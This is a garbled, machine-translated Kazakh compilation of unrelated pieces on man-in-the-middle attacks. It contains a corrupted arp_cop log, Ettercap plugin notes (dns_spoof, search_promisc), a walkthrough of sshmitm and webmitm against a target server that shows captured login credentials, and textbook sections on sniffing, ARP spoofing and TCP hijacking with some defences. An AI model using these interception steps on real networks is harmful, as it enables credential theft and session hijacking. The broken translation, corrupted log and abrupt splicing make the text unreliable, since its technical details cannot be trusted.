(ЕСКЕРТУ) 192.168.1.35 192.168. 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168 .1.35 192.168.1.1 arp_cop болып көрінеді: (ЕСКЕРТУ) 192.168. 1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) 192.168.1.35 ұқсайды a1119. arp.cop. 92.168.1.35 192.168.1.1 болып көрінеді p_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 1618.1619. 1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) RNING) 192.168.1.35 192.168.1.35 192.168.1921. arp_cop болып көрінеді. 168.1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) 192.168.1.35 өзін 192 деп көрсетеді. 168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 өзін 192.168.1.1 arp_cop: (WAR2.16.1.15 дейін. 192.1 68.1.1 arp_cop: (ЕСКЕРТУ ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 болып көрінеді arp_cop: (ЕСКЕРТУ) 92.168.1.1.cop. (ЕСКЕРТУ) 192.168.1.35 өзін 192.168. .1.1 arp_cop: (ЕСКЕРТУ) 192.168.1.35 192.168.1.1 .1 arp_cop: (ЕСКЕРТУ) 192.168. 1.35 192.168.1.1. be 192.168.1.1 arp_cop: (ЕСКЕРТУ ) 192.168.1.35 192.168.1.1 arp_cop: (ЕСКЕРТУ) 192.168.1 .35 192.168.1.1 болып көрінеді ................................. ..

7.2 автоқосу

Ол mitm улану ARP-ге қосылғанда жаңа құрбандарды автоматты түрде қосады. Ол жергілікті желіде ARP сұрауларын іздейді және табылса, тізім TARGET ретінде көрсетілген болса, плагин хостты құрбандар тізіміне қосады. Хост одан arp сұрауы көрінген кезде қосылады.

7.3 chk_у

Ол ettercap ішіндегі улы арп модульдерінің сәтті екенін тексереді. Ол жалған ICMP жаңғырық пакеттерін уланудан зардап шеккендердің барлығына жіберіп, әрбір құрбан болып көрінеді. Ол тағайындалған орын ретінде біздің MAC мекенжайымызбен ICMP жауабын ала алады, бұл осы екі нысананың арасындағы улану сәтті болғанын білдіреді. Ол әрбір қосылымның екі жолын да тексереді.

7.4 dns_spoof

Бұл плагин DNS сұрауларын үзеді және жалған (жалған) жауаппен жауап береді. etter.dns файлын өңдеу арқылы плагин қай мекенжайға жауап беретінін таңдауға болады. Плагин A, AAAA, PTR, MX, WINS, SRV және TXT сұрауларын ұстайды. Егер бұл A сұрауы болса, онда атау файлда іздестіріліп, IP мекенжайы қайтарылады (атауда қойылмалы таңбаларды пайдалануға болады).

Бұл AAAA сұрауларына да қатысты.

7.5 find_conn

Хост байланысқысы келетін барлық мақсаттарды көрсету үшін ARP сұрауларын тыңдайтын өте қарапайым плагин. Сондай-ақ ол белгісіз жергілікті желілердегі мекенжайларды табуға көмектеседі.

ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Жергілікті желіге жіберілген ettercap пакеттерін анықтау әрекеттері. Бұл ettercap пайдаланғысы келетін адамды анықтау үшін пайдалы болуы мүмкін. Оған 100% сенбеңіз, өйткені сынақтар тек белгілі бір реттілік/идентификатор нөмірлері үшін жұмыс істейді.

7.7 сканерлеуші_уландырғыш

Тізімдегі хосттардың кез келгені мен біздің арамызда біреудің ұрысып жатқанын тексеріңіз. Біріншіден, ол тізімдегі екі хосттың бірдей болуын тексереді Mac мекенжайы. Бұл олардың бірі бізді улап жатыр дегенді білдіруі мүмкін. Ол прокси arp ортасында көптеген жалған позитивтерді жасай алады. Бұл тексеруді орындау үшін хосттар тізімін жасау керек. Осыдан кейін ол тізімдегі әрбір хостқа icmp жаңғырық пакеттерін жібереді және жауап бастауының Mac мекенжайы осы IP арқылы тізімде сақталған мекенжайдан өзгеше екенін тексереді. Бұл біреу біздің IP-мекен-жайымыз бар болып көрініп, ұсталған пакеттерді бізге жіберу арқылы осы хостты уландырып жатқанын білдіруі мүмкін. Сіз бұл белсенді сынақты зиянсыз (зиянсыз) режимде іске қоса алмайсыз.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Ол біреудің азғындық режимінде иіскеп (тыңдап) жатқанын анықтауға тырысады. Ол хосттар тізіміндегі әрбір мақсатқа екі түрлі дұрыс емес arp сұрауын жібереді және жауаптарды күтеді. Жауап мақсатты хосттан келсе, бұл мақсатта азғындық режимде желі картасы болуы ықтимал. Ол жалған дабылдарды тудыруы мүмкін. Оны пәрмен жолынан немесе плагиндер мәзірінен іске қосуға болады. Ол arp жауаптарын тыңдайтындықтан, arp сұрауларын жіберген кезде оларды пайдаланбағаныңыз дұрыс.

ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Азғындық режимінде екі NIC сәтті болжаудың мысалы:

Кеңейту

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 авторлық құқық 2001-2015 Ettercap әзірлеу тобы Тыңдау күні: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/252.35/2525:05:00.a. 27ff:feaf:30b9/64 SSL диссекциясы etter.conf файлында жарамды "redir_command_on" сценарийін қажет етеді Ettercap дұрыс жұмыс істемеуі мүмкін. /proc/sys/net/ipv6/conf/eth0/use_tempaddr 0 мәніне орнатылмаған. Артықшылықтар EUID 65534 EGID 65534... 33 плагиндер 42 протокол диссекторлары 57 бақыланатын порттар 20388 mac сатушысының саусақ ізі 1716 LuOS белгілі саусақ ізі қызметтері 1718 : ешқандай сценарий көрсетілмеді, іске қосылмайды! Сканерлеу үшін 255 хостты рандомизациялау... 255 хост үшін бүкіл желі маскасын сканерлеу... * |============================ = ===================>| 100,00 % Хосттар тізіміне 5 хост қосылды... Бірыңғай иіскеу іске қосылды... Тек мәтін интерфейсі іске қосылды... Желідегі анықтама үшін "h" түймесін басыңыз search_promisc плагинін іске қосу... search_promisc: Болжалды NIC іздеу... NIC иіскеу мүмкіндігі аз болуы мүмкін. : - 192.168.1.36 - 192.168.1.34 Сірә, иіскейтін NIC: - ЖОҚ. Мәтіндік интерфейс жабылуда... ettercap аяқталуда... Луаны тазалау аяқталды! Бірыңғай иіскеу тоқтатылды.

7.9 sslstrip

SSL mitm шабуылын орындау кезінде ettercap нақты ssl сертификатын өзінің сертификатымен ауыстырады. Жалған сертификат жылдам жасалады және барлық өрістер сервер ұсынған нақты сертификатқа сәйкес толтырылады.

(62%)

(56.5%)

(КЕЗЕДІ - 0,2%)

Бұл мақалада біз сізбен «Ортадағы адам» шабуылдарын, дәлірек айтқанда, әдісті талқылаймыз
Man in Middle шабуылы арқылы SSH және HTTP трафигін қайта бағыттау. Мысықты құйрығынан тартпай, іске кірісейік.

Ортадағы адам (қысқаша айтқанда, MitM, орыс тілінен қарапайым - «делдалдық шабуыл» немесе «адам»
ортасында») - ақпаратты ұстап алу үшін екі машина арасындағы трафикті қайта бағыттауға негізделген шабуыл түрі - оны әрі қарай зерттеу, жою немесе өзгерту. Сонымен, бізге бірінші қажет нәрсе - dsniff пакеті (сіз мына жерден пакетке сілтемені көресіз Неліктен бұл пакетте келесі қауіпсіздік схемасын айналып өтетін sshmitm (SSH трафигін қайта бағыттау) және httpmitm (HTTP трафигін қайта бағыттау) қоса алғанда, барлық қажетті утилиталар бар: сіз білетіндей, деректерді шифрлауы бар протоколдар. өте «қауіпсіз» (көмектесу үшін шифрлау :)) және желі деңгейінен «жоғарғы» шабуылдарға жол бермеңіз. Шифрлау кілті хакерге белгісіз - деректерді шифрдан шығару және пәрменді енгізу де мүмкін емес. Барлығы сияқты жақсы болу үшін, бірақ міне, қалай
dsniff бумасындағы MitM шабуыл бағдарламалары (sshmitm және httpmitm) айналып өтуге қабілетті болғандықтан бұл жүйеқауіпсіздік (сіз бәрін дерлік айналып өтуге болады). Мұның бәрі келесі принцип бойынша жүзеге асырылады:
аралық хост клиенттен сұрауды алады, оған сервер екенін «айтып», содан кейін нақты серверге қосылады.
Бізге қажет екінші нәрсе - түзу қолдар, төртінші - ең бастысы - тілек және, әрине, құрбан, яғни біз шабуыл жасайтын компьютер.

SSH трафигін қайта бағыттау

Құралдар жинағын дайындағаннан кейін сіз ненің не екенін және неге екенін түсіндіңіз :). Sshmitm алыңыз - енді біз SSH трафигін қайта бағыттаймыз (теориялық бөліммен түсінбегенімнің барлығы - жоғарыда оқыңыз)
оны пайдалана отырып, бүгінгі ПҚИ кемшіліктерін пайдалана отырып (ашық кілттік инфрақұрылым – негізгі басқару схемасы негізінде
асимметриялық криптография әдістері). Синтаксисті қарастырайық
sshmitm:

sshmitm [-d] [-I] [-p порт] хост

D
отладка шығаруға рұқсат беру (яғни, кеңейтілген режим)

I
сеансты ұрлау

P порты
тыңдау порты

хост
сеанстары ұсталатын қашықтағы хосттың мекенжайы

порт
қашықтағы хосттағы порт

Барлығы қарапайым және дәмді болып көрінеді - күрделі ештеңе жоқ :). Шабуылды бастайық!

# sshmitm server.target.gov // SSH серверіңізді көрсетіңіз
sshmitm: server.target.gov серверіне өту

Бізде нақты SSH кілті болмағандықтан, шабуыл жасалған команданың аудармашысы
хост кілтін тексеру сұрауын көрсетеді, барлығы келесідей болады:

clientmachine$server.target.gov
@ЕСКЕРТУ: ҚАШЫҚТАН ХОСТ ИДЕНТИФИКАЦИЯСЫ ӨЗГЕРТТІ! @
БІРЕУ ЖҰМЫС ЖАСАУЫ МҮМКІН!
Дәл қазір біреу сізді тыңдауы мүмкін (ортадағы адам шабуылы)!
Сондай-ақ, RSA хост кілті жаңа ғана өзгертілген болуы мүмкін.
Жүйе әкімшісіне хабарласыңыз.

Содан кейін пайдаланушы қосылу немесе қосылмау туралы шешім қабылдайды. Олай болса, SSH сеансын толық бақылауға аламыз.
БІРАҚ! Егер пайдаланушы бұл арбаға ешқашан қосылмаған болса, келесі хабарлама көрсетілуі мүмкін:

"server.target.gov" хостының түпнұсқалығын анықтау мүмкін емес
RSA кілтінің саусақ ізі
бла:бла:бла;бла;бла.......
Жалғастыруды қалайсыз ба (иә/жоқ)?

Мұнда пайдаланушының екі таңдауы бар - қосылу немесе қосылмау. Егер иә болса, біз сессияны тоқтаттық, егер жоқ болса, өкінішке орай ... :(.
Тұтастай алғанда, егер пайдаланушы қосылса, шабуыл сәтті болды, ал sshmitm, өз кезегінде, барлық өтулер мен логиндерді жазады және өте оқылады 🙂
Әрине, бұл жалғыз SSH сеансын ұстағыш емес, бірақ сіз онымен танысқаннан кейін екіншісін оңай меңгересіз 🙂

HTTP трафигін қайта бағыттау

Енді біз HTTP трафигін қайта бағыттаймыз. Тағы да бізге таңдалған құрал қажет: httpmitm, ол 80- (HTTP -) және 443- (HTTPS -) порттарды тыңдайды, WEB сұрауларын тоқтатады, содан кейін серверге қосылып, сұрауларды клиенттік компьютерге қайта жібереді. Бағдарлама сонымен қатар OpenSSL көмегімен SSL кілттері мен SSL сертификаттарын жасайды. Содан кейін тырысқаннан кейін
сайтқа (target.gov) қосылса, браузер SSL сертификатын тексереді. Сертификаттар сәйкес келмейтіндіктен, пайдаланушы браузері бұл туралы ескертеді
қате SSL сертификаты. Шабуылдаушының көзқарасы бойынша ол келесідей болады:

#webmitm -d
webmitm: мөлдір трансляция
webmitm: жаңа қосылым
[сілтеме]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[нұсқасын] АЛУ
Байланыс: [түрі]
Хост: www.target.gov
User-Agent: [жүйе, браузер туралы ақпарат]
[және т.б., т.б.]
Cookie: [cookie файлдары]

Сыртынан қарағанда мынау -
SSL қосылымы үзіліп, шифрланбаған деректерді тартып алады.

Қорытынды

Бұл мақалада біз сіздермен SSH және HTTP трафигін Man in the Middle шабуылы арқылы қайта бағыттауды талқыладық - анық, егжей-тегжейлі, қысқаша. Басқа HTTP және SSH қайта бағыттау бағдарламалары
MitM көмегімен трафикті тез меңгересіз, егер сіз бұларды да меңгерген болсаңыз :)). Егер бірдеңе анық болмаса - онда.

Желі арқылы мәліметтерді ұстап алу – қашықтағы компьютерлік құрылғыдан кез келген ақпаратты алу. Ол пайдаланушының жеке ақпаратынан, оның хабарламаларынан, веб-сайттарға кіру жазбаларынан тұруы мүмкін. Деректерді түсіру шпиондық бағдарлама немесе желілік снайферлер көмегімен жүзеге асырылуы мүмкін.

Шпиондық бағдарлама – белгілі бір жұмыс станциясынан немесе құрылғыдан желі арқылы берілетін барлық ақпаратты жазуға қабілетті арнайы бағдарламалық құрал.

Снайфтер – желі арқылы өтетін трафикті ұстайтын және талдайтын бағдарлама немесе компьютерлік жабдық. Снайфтер веб-сеансқа қосылуға және компьютер иесінің атынан әртүрлі әрекеттерді орындауға мүмкіндік береді.

Егер ақпарат нақты уақытта берілмесе, шпиондық бағдарламаақпаратты қарауға және талдауға ыңғайлы есептерді жасау.

Желіні тыңдау заңды түрде ұйымдастырылуы немесе заңсыз орындалуы мүмкін. Ақпаратты алудың заңдылығын бекітетін негізгі құжат Киберқылмыс туралы конвенция болып табылады. Ол 2001 жылы Венгрияда құрылған. Әр түрлі мемлекеттердің құқықтық талаптары біршама өзгеше болуы мүмкін, бірақ негізгі мағынасы барлық елдер үшін бірдей.

Желі арқылы мәліметтерді ұстап алудың жіктелуі және әдістері

Жоғарыда айтылғандарға сәйкес желі арқылы ақпаратты ұстауды екі түрге бөлуге болады: рұқсат етілген және рұқсат етілмеген.

Рұқсат етілген деректерді алу корпоративтік ақпаратты қорғаудан мемлекеттің қауіпсіздігін қамтамасыз етуге дейінгі әртүрлі мақсаттарда жүзеге асырылады. Мұндай операцияны жүзеге асырудың негіздері заңнамамен, арнайы қызметтермен, құқық қорғау органдарының қызметкерлерімен, мамандарымен айқындалады. әкімшілік ұйымдаржәне компанияның қауіпсіздік қызметтері.

Деректерді ұстап алуды жүзеге асырудың халықаралық стандарттары бар. Еуропалық телекоммуникация стандарттары институты ақпаратты ұстап алу негізделген бірқатар техникалық процестерді (ETSI ES 201 158 «Телекоммуникациялық қауіпсіздік; Заңды ұстап алу (LI); желілік функцияларға қойылатын талаптар») бірыңғай стандартқа келтіруге қол жеткізді. Нәтижесінде құпия қызмет мамандарына, желі әкімшілеріне желіден деректерді заңды түрде қабылдауға көмектесетін жүйелік архитектура әзірленді. Желі арқылы деректерді ұстап алуды жүзеге асыру үшін әзірленген құрылым сымды және үшін пайдаланылады сымсыз жүйелердауыстық қоңыраулар, сондай-ақ пошта арқылы хат алмасу, IP арқылы дауыстық хабарламалар, SMS арқылы ақпарат алмасу.

Желі арқылы деректерді рұқсатсыз ұстап алуды құпия деректерді, парольдерді, корпоративтік құпияларды, желідегі компьютерлік машиналардың мекенжайларын және т.б. иемденгісі келетін зиянкестер жүзеге асырады. Өз мақсаттарына жету үшін хакерлер әдетте желілік трафик анализаторын – снайферді пайдаланады. Бұл бағдарламанемесе аппараттық-бағдарламалық құрал түріндегі құрылғы алаяққа куәліктерді ауыстыру арқылы шифрланған SSL трафигін қоса, жәбірленуші пайдаланушы қосылған желідегі ақпаратты ұстап алу және талдау мүмкіндігін береді. Трафик деректерін әртүрлі тәсілдермен түсіруге болады:

желі интерфейсінде тыңдау,
интерцепторды арнаның үзілуіне қосу,
трафик тармағын құру және оны снайферге көшіру,
шабуыл жасау арқылы.

Желінің өзара әрекеттестігіне енуге және деректерді өзгертуге мүмкіндік беретін құпия ақпаратты ұстаудың күрделірек технологиялары бар. Осындай әдістердің бірі жалған ARP сұраулары болып табылады. Әдістің мәні жәбірленушінің компьютері мен шабуылдаушы құрылғысы арасындағы IP мекенжайларын бұрмалау болып табылады. Желі арқылы деректерді ұстап алудың тағы бір әдісі - жалған маршруттау. Ол желілік маршрутизатордың IP мекенжайын өз мекен-жайымен ауыстырудан тұрады. Егер киберқылмыскер жәбірленуші орналасқан жергілікті желінің қалай ұйымдастырылғанын білсе, онда ол пайдаланушының машинасынан өзінің IP мекенжайына ақпарат алуды оңай ұйымдастыра алады. TCP қосылымын түсіру де қызмет етеді тиімді түрдедеректерді ұстап алу. Шабуылдаушы жәбірленушінің компьютеріне TCP пакеттерін жасау және жіберу арқылы байланыс сеансын үзеді. Әрі қарай, байланыс сеансы клиенттің орнына қалпына келтіріліп, ұсталады және қылмыскер жалғастырады.

Әсер ету объектісі

Желі арқылы мәліметтерді ұстап алу объектілері мемлекеттік органдар, өндірістік кәсіпорындар, коммерциялық құрылымдар, қарапайым пайдаланушылар болуы мүмкін. Желілік инфрақұрылымды қорғау үшін ұйымның немесе бизнес-компанияның ішінде ақпаратты алуды жүзеге асыруға болады. Арнайы қызметтер мен құқық қорғау органдары тапсырмаға байланысты әртүрлі иелерден берілетін ақпаратты жаппай ұстауды жүзеге асыра алады.

Егер киберқылмыскерлер туралы айтатын болсақ, онда кез келген пайдаланушы немесе ұйым желі арқылы берілетін деректерді алу үшін ықпал ету объектісіне айналуы мүмкін. Рұқсат етілген қол жеткізу кезінде алынған ақпараттың ақпараттық бөлігі маңызды, ал шабуылдаушыны иеленуге болатын деректер қызықтырады. қолма-қол ақшаменнемесе кейіннен сату үшін құнды ақпарат.

Көбінесе киберқылмыскерлердің ақпаратты ұстап алуының құрбандары қоғамдық желіге қосылатын пайдаланушылар болып табылады, мысалы, нүктесі бар кафеде. WiFi қатынасы. Шабуылдаушы снайфер арқылы веб-сеансқа қосылып, деректерді ауыстырады және жеке ақпаратты ұрлайды. Мұның қалай болатыны туралы толығырақ мақалада сипатталған.

Қауіп көзі

Кәсіпорындар мен ұйымдардағы ақпаратты рұқсат етілген ұстауды жалпыға ортақ желілік инфрақұрылым операторлары жүзеге асырады. Олардың қызметі жеке деректерді, коммерциялық құпияларды және т.б. қорғауға бағытталған маңызды ақпарат. Заңды негізде азаматтар мен мемлекеттің қауіпсіздігін қамтамасыз ету үшін хабарламалар мен файлдардың берілуін арнайы қызметтер, құқық қорғау органдары және әртүрлі мемлекеттік органдар бақылай алады.

Шабуылшылар деректерді заңсыз ұстаумен айналысады. Киберқылмыскердің құрбаны болмау үшін сарапшылардың кейбір ұсыныстарын орындау керек. Мысалы, жалпыға ортақ желілерге қосылған жерлерде құпия деректерді авторизациялауды және тасымалдауды талап ететін әрекеттерді орындамау керек. Шифрланған желілерді таңдау қауіпсіз, тіпті жақсырақ, жеке 3G және LTE модемдерін пайдалану. Жеке деректерді тасымалдау кезінде оны HTTPS протоколы немесе жеке VPN туннелі арқылы шифрлау ұсынылады.

Сіз криптография, антиснайферлер көмегімен компьютеріңізді желілік трафикті ұстап қалудан қорғай аласыз; сымсыз желіге қатынау емес, теру тәуекелдерді азайтады.

Бұл сабақ желілік пакеттерді ұстауға негізделген желіні бұзу технологияларын сипаттайды. Хакерлер мұндай технологияларды құнды ақпаратты ұрлау үшін желілік трафикті иіскеу, «ортадағы адам» шабуылы мақсатында деректерді ұстап алу, TCP қосылымдарын ұстап алу, мысалы, деректерді бұрмалауға және басқаларды бірдей орындау үшін пайдаланады. қызықты әрекеттер. Өкінішке орай, бұл шабуылдардың көпшілігі іс жүзінде тек Unix желілері үшін жүзеге асырылады, олар үшін хакерлер екеуін де пайдалана алады. арнайы утилиталар, және Unix жүйелік құралдары. Windows желілерін хакерлер айналып өтетін сияқты, сондықтан біз деректерді ұстау құралдарының сипаттамасын желілік пакеттерді тривиальды иіскеуге арналған бағдарламаларды анықтау үшін шектеуге мәжбүрміз. Дегенмен, кем дегенде, мұндай шабуылдардың теориялық сипаттамасын, әсіресе анти-хакерлер үшін назардан тыс қалдыруға болмайды, өйткені қолданылатын хакерлік технологияларды білу көптеген қиындықтардың алдын алуға көмектеседі.

Желіні иіскеу

Ethernet желілерін иіскеу үшін әдетте пайдаланылады желілік карталартыңдау режиміне қойыңыз. Тыңдау Ethernet желілері sniffer бағдарламасымен жұмыс істейтін компьютерді желі сегментіне қосуды талап етеді, содан кейін хакер осы желі сегментіндегі компьютерлер жіберетін және қабылдайтын барлық желілік трафикке қол жеткізе алады. Сымсыз желі делдалдарының көмегімен радио желілерінің трафигін ұстап алу одан да оңай - бұл жағдайда кабельге қосылу үшін орын іздеудің қажеті жоқ. Немесе зиянкес компьютерді Интернет-серверге қосатын телефон желісіне қосыла алады, бұл үшін ыңғайлы орын таба алады (телефон желілері әдетте жертөлелерде және басқа да қорғалмаған жерлерде жүргізіледі).

Иістеу технологиясын көрсету үшін біз көптеген веб-сайттардан табуға болатын өте танымал SpyNet иіскегіш бағдарламасын қолданамыз. SpyNet бағдарламасының ресми веб-сайты http://members.xoom.com/layrentiu2/ мекенжайында орналасқан, онда бағдарламаның демо нұсқасын жүктеп алуға болады.

SpyNet бағдарламасы екі компоненттен тұрады - CaptureNet және PipeNet. CaptureNet бағдарламасы желі деңгейінде Ethernet желісі арқылы берілетін пакеттерді түсіруге мүмкіндік береді, яғни. Ethernet кадрлары ретінде. PipeNet бағдарламасы Ethernet кадрларын қолданбалы деңгей пакеттеріне жинауға, мысалы, хабарламаларды қалпына келтіруге мүмкіндік береді. Электрондық пошта, HTTP протоколының хабарламалары (веб-сервермен ақпарат алмасу) және басқа функцияларды орындайды.

Өкінішке орай, SpyNet демонстрациясында PipeNet мүмкіндіктері HTTP пакетін құрастыру демонстрациясымен шектелген, сондықтан біз SpyNet-ті толығымен көрсете алмаймыз. Дегенмен, біз SpyNet желісін иіскеу мүмкіндіктерін мысал ретінде тәжірибелік желімізді пайдаланып көрсетеміз. мәтіндік файл Sword-2000 хостынан Alex-3 хостына әдеттегідей Windows Explorer. Сонымен бірге, A1ex-1 компьютерінде біз CaptureNet бағдарламасын іске қосамыз, ол жіберілген пакеттерді ұстап алады және Ethernet фреймдерінде тасымалданатын файлдың мазмұнын оқуға мүмкіндік береді. Суретте. 1 secret.txt файлындағы құпия хабарламаның мәтінін көрсетеді; біз бұл мәтінді ұсталған Ethernet фреймдерінен табуға тырысамыз.

Күріш. 1. Блокнот терезесіндегі құпия хабарлама мәтіні

Ethernet кадрларын түсіру үшін мына қадамдарды орындаңыз.

Alex-3 компьютерінде CaptureNet бағдарламасын іске қосыңыз. Бағдарламаның көрсетілетін жұмыс терезесінде мәзір командасын таңдаңыз Capture * Start (Capture * Start) және желілік кадрларды ұстау процесін бастаңыз.

Windows Explorer арқылы security.txt файлын Sword-2000 компьютерінен A1ex-3 файлына көшіріңіз.

secret.txt файлын тасымалдағаннан кейін Түсіру * Тоқтату мәзірінің пәрменін таңдап, түсіру процесін тоқтатыңыз.

Түсірілген Ethernet кадрлары CaptureNet жұмыс терезесінің оң жағында көрсетіледі (2-сурет), жоғарғы тізімдегі әрбір жол Ethernet жақтауын білдіреді, ал тізімнің астында таңдалған кадрдың мазмұны көрсетіледі.

Күріш. 2. Ethernet жақтауы құпия хабарламаның мәтінін қамтиды

Ұсталған кадрлар тізімін қарап отырып, біз жіберген мәтінді қамтитынын оңай таба аламыз. Бұл өте үлкен құпия (Бұл өте үлкен құпия).

Бұл барлық ұсталған желі трафигі жазылған ең қарапайым мысал екенін атап өтеміз. CaptureNet бағдарламасы белгілі бір протоколдар арқылы және белгілі бір хост порттарына жіберілген пакеттерді түсіруге, белгілі бір мазмұны бар хабарларды таңдауға және түсірілген деректерді файлға жинақтауға мүмкіндік береді. Мұндай әрекеттерді орындау техникасы қарапайым және оны SpyNet бағдарламасының анықтамалық жүйесінен білуге болады.

Желідегі қарапайым тыңдаудан басқа, хакерлерге деректерді ұстап алудың неғұрлым күрделі құралдары бар. Төменде теориялық аспектіде мұндай әдістерге қысқаша шолу берілген. Себебі, Windows желілері үшін деректерді тыңдау шабуылдарын іс жүзінде жүзеге асыру өте шектеулі және тыңдау шабуылдарына арналған сенімді құралдар жиынтығы өте нашар.

Желілік трафикті ұстау әдістері

Жоғарыдағы CaptureNet сияқты желілік снайферлік бағдарламалармен желіні тыңдау деректерді ұстаудың бірінші, ең оңай жолы болып табылады. SpyNet-тен басқа, желіні анықтау желілік белсенділікті талдау, желілерді диагностикалау, көрсетілген критерийлер бойынша трафикті таңдау және басқа желіні басқару тапсырмалары үшін бастапқыда әзірленген көптеген құралдарды пайдаланады. Мұндай бағдарламаның мысалы tcpdump (http://www.tcpdump.org ), ол желілік трафикті кейінірек талдау үшін арнайы журналға жазуға мүмкіндік береді.

Желіні тыңдаудан қорғау үшін арнайы бағдарламалар қолданылады, мысалы, AntiSniff (http://www.securitysoftwaretech.com/antisniff ), олар желідегі желілік трафикті тыңдайтын компьютерлерді анықтауға қабілетті. Өз мәселелерін шешу үшін иіске қарсы бағдарламалар желіде тыңдау құрылғыларының бар екендігінің арнайы белгісін пайдаланады - спиферлік компьютердің желілік картасы арнайы тыңдау режимінде болуы керек. Тыңдау режимінде желіге қосылған компьютерлер сыналатын хостқа жіберілген IP датаграммаларына арнайы жауап береді. Мысалы, тыңдау хосттары әдетте хост мекенжайына жіберілген датаграммаларды ғана емес, барлық кіріс трафикті өңдейді. AntiSniff тани алатын күдікті хост әрекетінің басқа белгілері бар.

Жалған ARP сұраулары

Екі A және B хосттары арасындағы желілік байланыс процесін ұстап тұру және айналдыру үшін шабуылдаушы A және B хосттарына жалған ARP (мекенжайды шешу протоколы) хабарламаларын жіберу арқылы өзара әрекеттесетін хосттардың IP мекенжайларын өздерінің IP мекенжайларымен ауыстыра алады. . ARP хаттамасын хосттың IP мекенжайын хосттың NIC желісіне қосылған машина мекенжайына (MAC мекенжайы) шешу (аудару) жолын сипаттайтын D қосымшасында табуға болады. А және В хосттары арасындағы желілік байланысты тоқтату үшін хакер ARP протоколын қалай пайдалана алатынын көрейік.

Шабуылдаушы A және B хосттарының MAC мекенжайларын анықтайды, мысалы, W2RK бумасындағы nbtstat пәрменін пайдаланады.

Шабуылдаушы A және B хосттарының анықталған MAC мекенжайларына хабарламалар жібереді, олар компьютерлердің MAC мекенжайларына хосттардың IP мекенжайларын шешуге арналған сұрауларға жалған ARP жауаптары болып табылады. А хостына В хостының IP мекенжайы шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні айтылады; В хостына А хостының IP мекенжайы да шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіні айтылады.

А және В хосттары қабылданған MAC мекенжайларын өздерінің ARP кэштеріне енгізеді, содан кейін оларды бір-біріне хабарламалар жіберу үшін пайдаланады. А және В IP мекенжайлары шабуылдаушы компьютерінің MAC мекенжайына сәйкес келетіндіктен, А және В хосттары ештеңеден бейхабар, өз хабарламаларымен қалағанын жасай алатын делдал арқылы байланысады.

Мұндай шабуылдардан қорғау үшін желі әкімшілері желілік компьютерлерінің MAC мекенжайлары мен IP мекенжайлары арасындағы салыстыру кестесі бар дерекқорды жүргізуі керек. Әрі қарай, арнайы пайдалану бағдарламалық қамтамасыз ету, мысалы, arpwatch утилитасы (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz ) желідегі сәйкессіздіктерге мерзімді түрде сканерлей алады.

UNIX желілерінде жалған ARP шабуылының бұл түрі arpredirect сияқты жүйенің желілік трафикті бақылау және басқару утилиталары арқылы жүзеге асырылуы мүмкін. Өкінішке орай, Windows 2000/XP желілері мұндай сенімді утилиталарды іске асырмайтын сияқты. Мысалы, NTsecurity веб-сайтында (http://www.ntsecurity.nu) сіз желілік хосттар арасындағы трафикті қайта бағыттау құралы ретінде ұсынылған GrabitAII утилитасын жүктей аласыз. Дегенмен, GrabitAII утилитасының өнімділігін қарапайым тексеру оның өз функцияларын жүзеге асыруда әлі де толық табысқа жетпейтінін көрсетеді.

Жалған маршруттау

Маршрутизацияны жүзеге асыру үшін шабуылдаушы А хосты орналасқан жергілікті желіні ұйымдастыру туралы кейбір мәліметтерді білуі керек, атап айтқанда трафик А хостынан В хостына жіберілетін маршрутизатордың IP мекенжайын білуі керек. Бұны біле отырып, шабуылдаушы. IP датаграммасын құрайды, онда IP - Бастапқы мекенжай маршрутизатордың IP мекенжайы ретінде көрсетіледі, ал тағайындалған орын A хосты болып табылады. Сондай-ақ, датаграммаға IP мекенжайына орнатылған жаңа маршрутизатордың мекенжай өрісі орнатылған ICMP Redirect хабарламасы кіреді. шабуылдаушының компьютерінен. Мұндай хабарламаны алғаннан кейін А хосты барлық хабарламаларды шабуылдаушы компьютерінің IP мекенжайына жібереді.

4-тарауда сипатталған ақпарат алмасуды қорғаудың барлық криптографиялық әдістерін іс жүзінде жүзеге асыру VPNs (Virtual Private Networks - Virtual Private Networks) арқылы қамтамасыз етілген. Криптографиялық қорғаудың принциптері мен әдістеріне қысқаша шолуды Е қосымшасынан табуға болады және толық сипаттама PGP Desktop Security (http://www.pgp.com) қамтамасыз ететін криптографиялық қорғау.

TCP қосылымын тоқтату

TCP ұрлау шабуылдарын орындау үшін бірнеше тиімді утилиталар жасалды, бірақ олардың барлығы Unix платформасы үшін жүзеге асырылады және бұл утилиталар веб-сайттарда тек бастапқы код түрінде қол жетімді. Осылайша, біз, бұзудың асыл себебіне сенімді тәжірибешілер ретінде, TCP қосылымын ұстап қалу арқылы шабуылдарды аз пайдаланамыз. (Әуесқойлар басқа біреудің бағдарлама кодын түсіну үшін http://www.cri.cz/~kra/index.html сайтына сілтеме жасай алады, оны жүктеп алуға болады. көзібелгілі TCP қосылымын үзу утилитасы Павел Крауздың Hunt).

